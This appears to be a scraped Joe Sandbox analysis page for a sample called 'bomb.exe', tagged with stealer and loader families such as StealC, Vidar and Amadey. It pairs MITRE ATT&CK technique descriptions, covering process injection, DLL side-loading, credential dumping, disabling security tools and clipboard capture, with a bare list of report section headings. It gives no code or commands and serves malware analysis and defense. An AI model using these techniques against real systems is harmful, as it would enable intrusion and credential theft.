Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bomb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Phorpiex

Threatname: Amadey

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Windows Analysis Report
bomb.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre